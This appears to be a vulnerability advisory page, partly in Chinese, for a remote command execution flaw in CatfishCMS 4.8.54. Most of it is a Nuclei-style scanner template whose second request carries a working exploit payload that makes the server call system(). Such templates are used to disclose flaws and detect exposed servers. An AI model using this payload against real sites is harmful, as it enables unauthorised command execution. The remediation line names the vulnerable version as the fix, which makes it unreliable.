CNVD-2019-06255: CatfishCMS - Remote Command Execution

日期: 2025-08-01 | 影响软件: CatfishCMS | POC: 已公开

漏洞描述

CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.

PoC代码[已公开]

id: CNVD-2019-06255

info:
  name: CatfishCMS - Remote Command Execution
  author: Lark-Lab
  severity: critical
  description: |
    CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
  remediation: Upgrade to CatfishCMS version 4.8.54 or later.
  reference:
    - https://its401.com/article/yun2diao/91344725
    - https://github.com/xwlrbh/Catfish/issues/4
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: cnvd,cnvd2019,rce,catfishcms,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        internal: true
        words:
          - 'content="Catfish CMS'

  - method: GET
    path:
      - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'OS'
          - 'PATH'
          - 'SHELL'
          - 'USER'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200bb88a78ef06722f43bbe1a1157a1ae7d17bac371f2a1abc12d2902ab5e977ec022070adc044cb4038e6d63456af8c7a9b62766ac6709ebe29db1ac6e34e90813636:922c64590222798bb761d5b6d8e72950

相关漏洞推荐